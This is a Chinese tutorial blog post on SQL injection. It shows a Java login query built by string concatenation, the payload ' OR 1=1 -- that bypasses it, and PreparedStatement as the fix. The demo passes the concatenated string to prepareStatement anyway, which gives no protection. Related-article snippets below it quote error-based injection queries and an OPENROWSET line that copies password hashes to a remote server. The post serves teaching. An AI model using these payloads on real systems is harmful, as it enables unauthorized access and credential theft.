SQL注入问题总结

最新推荐文章于 2024-07-23 11:32:15 发布
最新推荐文章于 2024-07-23 11:32:15 发布
阅读量6.6k 收藏 5
点赞数 3
分类专栏: 【Tips】 【Java】 文章标签: sql table user string insert exception
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiazdong/article/details/7368576
版权


一、SQL注入介绍


SQL注入就是将原本的SQL语句的逻辑结构改变,使得SQL语句的执行结果和原本开发者的意图不一样;

方法:在表单中将命令当作用户输入提交给程序;


二、SQL注入范例


这里我们根据用户登录页面

 <form action="" >
	用户名:<input type="text" name="username"><br/>
	密  码:<input type="password" name="password"><br/>
  </form>

预先创建一个表:

create table user_table(
	id		int	Primary key,
	username	varchar(30),
	password	varchar(30)
);
insert into user_table values(1,'xiazdong-1','12345');
insert into user_table values(2,'xiazdong-2','12345');

一般查询数据库的代码如下:

public class Demo01 {
	public static void main(String[] args) throws Exception {
		String username = "xiazdong";
		String password = "12345";	
		String sql = "SELECT id FROM user_table WHERE " + "username='" + username
				+ "'AND " + "password='" + password + "'";
		Class.forName("com.mysql.jdbc.Driver");
		Connection con = DriverManager.getConnection("jdbc:mysql://localhost:3306/db1","root","12345");
		PreparedStatement stat = con.prepareStatement(sql);
		System.out.println(stat.toString());
		ResultSet rs = stat.executeQuery();
		while(rs.next()){
			System.out.println(rs.getString(1));
		}
	}
}

但是这里username=xiazdong,password=12345,

因此此处的SQL语句为:

SELECT id FROM user_table WHERE username='xiazdong' AND password='12345';

如果我们把username和password的值变为:

username='  OR 1=1 --
password=x

会变成一个很可怕的情况:将把数据库中所有用户都列出来,为什么呢?

因为SQL语句现在为:

SELECT id FROM user_table WHERE username='' OR 1=1 -- ' AND password='12345';

因为--表示SQL注释,因此后面语句忽略;

因为1=1恒成立,因此 username='' OR 1=1  恒成立,因此SQL语句等同于:

SELECT id FROM user_table;

很奇妙吧....


三、解决方法


其实解决方法很简单,就是使用PreparedStatement即可;


最后引入一张SQL注入的图片:




xiazdong
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
深入浅出SQL注入
爱技术 爱生活
11-11 2821
之前在做学生信息管理系统和机房收费系统的时候,对于SQL注入问题已经是司空见惯,但是并没有真正的地形象生动的理解SQL注入到底是什么玩意儿.直到这次做牛腩才在牛老师的举例之下,明白了原来SQL注入是真的很危险啊. 问题提出     我们先来构造一个简单的添加新闻类别的程序,在动态网页上添加一个TextBox控件,一个Button控件,一个GridView控件。布局如下图所示: 然后
SQL注入攻击
最新发布
qq_67812668的博客
08-05 864
1.SQL注入的原理SQL注入就是通过web表单吧SQL命令提交到web应用程序,由于程序没有细致的过滤用户输入的数据,造成字符串拼接,进而恶意的SQL语句被执行,造成数据库信息泄露,网页篡改,数据库被恶意操作等 2.SQL注入的危害数据库信息泄漏:数据库中存放的用户的隐私信息的泄露。网页篡改:通过操作数据库对特定网页进行篡改。网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员账户被窜改。
让你彻底明白sql注入攻击
方志朋的博客
01-06 322
点击上方蓝色“方志朋”,选择“设为星标”回复“666”获取独家整理的学习资料!SQL注入攻击是黑客对数据库进行攻击常用的手段之一,随着B/S模式应用开发的发展,使用这种模式编写应用程序的程...
Sql注入深入学习
永不垂头的博客
07-28 264
学习笔记—Sql注入深入学习 Sql注入深度学习 union注入 报错函数:floor() select rand(); Select * from test where id = 1 and (select 1 from(select count(*),concat(user(),floor(rand(0)2))x from information_schema.tables group by x)a); select 1 and (select 1 from(select count(),conc
如何学习SQL注入基础以及深入研究
weixin_43639741的博客
05-20 922
NetSPI SQL Injection Wiki<SQL注入学习基础篇> 这个wiki的使命是成为一站式资源,用于在各种数据库管理系统(DBMS)中完全识别,利用和升级SQL注入漏洞。这个wiki假设您对SQL注入有基本的了解。 如果你英语不好推荐使用Google浏览器的网页翻译插件,可以自动翻译 但是如果你需要阅读SQL语句,推荐改为英文阅读即可 已中文翻译 未翻译 该WI...
pymysql如何解决sql注入问题深入讲解
09-09
总结,避免SQL注入的关键在于正确处理用户输入,使用参数化查询或存储过程可以显著提高代码安全性。在编写任何涉及用户输入的SQL语句时,应始终考虑可能的注入风险,并采取适当措施防止此类攻击。通过遵循最佳实践和...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
有效防止SQL注入的5种方法总结
09-09
框架如Hibernate、MyBatis等提供了对象关系映射,它们会自动处理SQL注入问题。ORM框架通常会将用户输入转化为安全的参数,从而减少直接操作SQL语句带来的风险。 4. 最小权限原则 数据库连接应使用具有最小权限的...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
SQL注射总结(7)
净心编程
12-29 1266
3、 复制哈西表(HASH)  这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;, select * from _sysxlogins) s
sql注入详解
m0_67392811的博客
06-12 6010
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
Sql注入详解(原理篇)
热门推荐
Naive的博客
09-11 1万+
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL注入问题
斌斌(Java)
07-02 1147
斌斌 (给我写信) 原创博文(http://blog.csdn.net/binbinxyz),转载请注明出处! 背景:对于ibaits参数引用可以使用#和$两种写法,其中#写法会采用预编译方式,将转义交给了数据库,不会出现注入问题;如果采用$写法,则相当于拼接字符串,会出现注入问题。 在使用ibatis时,我们的查询一般按如下写法进行配置。 SELECT * FROM EMP
SQL注入有哪些危害,要怎么避免
dexun123的博客
04-10 1570
SQL(结构化查询语言)是一种特殊目的的编程语言,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统。它在1974年由Boyce和Chamberlin提出,并首先在IBM公司研制的关系数据库系统SystemR上实现。由于它具有功能丰富、使用方便灵活、语言简洁易学等突出的优点,深受计算机工业界和计算机用户的欢迎。
应用安全系列之三十八:注入问题的成因以及预防原理
jimmyleeee的专栏
02-13 701
自从有了OWASP TOP的排名依赖,注入问题就一直排名前三,这就说明了注入问题对系统的影响是十分严重的,而且,注入问题一般比较容易被利用。 注入问题产生的根本原因就是程序在接受到请求中的参数时,没有经过严格的验证和正确地使用就直接被使用于解释型语言、结构化查询语言或者标签语言等语言的环境里用作程序执行的一部分。它的发生需要两个条件:
SQL 注入漏洞详解
Toasten
07-23 1484
SQL 注入即是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询从而进一步得到相应的数据信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值